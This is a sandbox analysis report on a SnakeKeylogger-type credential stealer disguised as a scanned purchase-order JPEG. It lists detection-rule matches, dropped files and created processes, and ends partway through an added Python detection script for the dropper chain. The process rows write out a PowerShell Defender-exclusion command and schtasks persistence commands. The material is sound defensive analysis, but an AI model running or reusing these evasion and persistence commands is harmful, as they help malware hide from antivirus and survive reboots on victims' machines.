                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, formAwesomeness.cs Large array initialization: array initializer size 684547
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, Program.cs Large array initialization: Program: array initializer size 4956
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe Process Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Code function: 8_2_085A7244 NtQueryInformationProcess
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe Code function: 8_2_085AB220 NtQueryInformationProcess
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E69A011_2_029E69A0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E3E0911_2_029E3E09
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029ECFAB11_2_029ECFAB
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E6FC811_2_029E6FC8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029ECCD811_2_029ECCD8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029E29E011_2_029E29E0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EE97B11_2_029EE97B
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_029EF96111_2_029EF961
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06961E8011_2_06961E80
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_069617A011_2_069617A0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06969C1811_2_06969C18
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696FC6811_2_0696FC68
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06968BA011_2_06968BA0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06960B3011_2_06960B30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696932811_2_06969328
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696502811_2_06965028
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696296811_2_06962968
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E6B011_2_0696E6B0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E6A011_2_0696E6A0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696DE0011_2_0696DE00
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06961E7011_2_06961E70
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696178F11_2_0696178F
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EF5111_2_0696EF51
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EF6011_2_0696EF60
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696CCA011_2_0696CCA0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696DDFE11_2_0696DDFE
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D55011_2_0696D550
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D54011_2_0696D540
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696954811_2_06969548
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EAF811_2_0696EAF8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E25811_2_0696E258
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696E24911_2_0696E249
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696F3B811_2_0696F3B8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696EB0811_2_0696EB08
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_06960B2011_2_06960B20
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D0F811_2_0696D0F8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D0E911_2_0696D0E9
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696F81011_2_0696F810
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696501811_2_06965018
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696000611_2_06960006
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696F80111_2_0696F801
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696004011_2_06960040
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D99911_2_0696D999
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 11_2_0696D9A811_2_0696D9A8
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static PE information: invalid certificate
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1740591125.000000000C120000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1732669565.0000000003490000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1731934591.000000000148E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4128482738.0000000000444000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129273715.0000000000D37000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Binary or memory string: OriginalFilenameOzOE.exe> vs Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HJnkiZjAPsec.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, VIPSeassion.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, VIPSeassion.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, nhtqyFvX8yKhXJY77Y.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, nhtqyFvX8yKhXJY77Y.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/11@4/4
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | File created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Mutant created: \Sessions\1\BaseNamedObjects\QmQWkgusceIGVbkjV
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | File created: C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | File read: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Source: unknown | Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Process created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Process created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
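The process-creation rows above are the whole dropper chain: the sample excludes its AppData copy from Defender through PowerShell, registers a scheduled task from an XML file written to the user's Temp directory, and relaunches its own image (a parent spawning a copy of itself is commonly the setup for a .NET RunPE-style injection into a suspended child); the dropped HJnkiZjAPsec.exe then repeats the last two steps. As an added example that is not part of the Joe Sandbox report, the following Python script runs those three checks over the rows, transcribed here as constructed (parent image, child command line) tuples. The event shape, the rule names and the user-writable/system split are this example's own assumptions, not anything the report defines.

```python
import re
from dataclasses import dataclass

# Constructed sample input (assumption: one (parent image, child command line)
# tuple per "Process created" row of the report). "unknown" is a parent the
# sandbox did not attribute, e.g. the initial launch or a task-scheduler start.
EVENTS = [
    ("unknown",
     r'"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"'),
    (r"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
     r'-ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"'),
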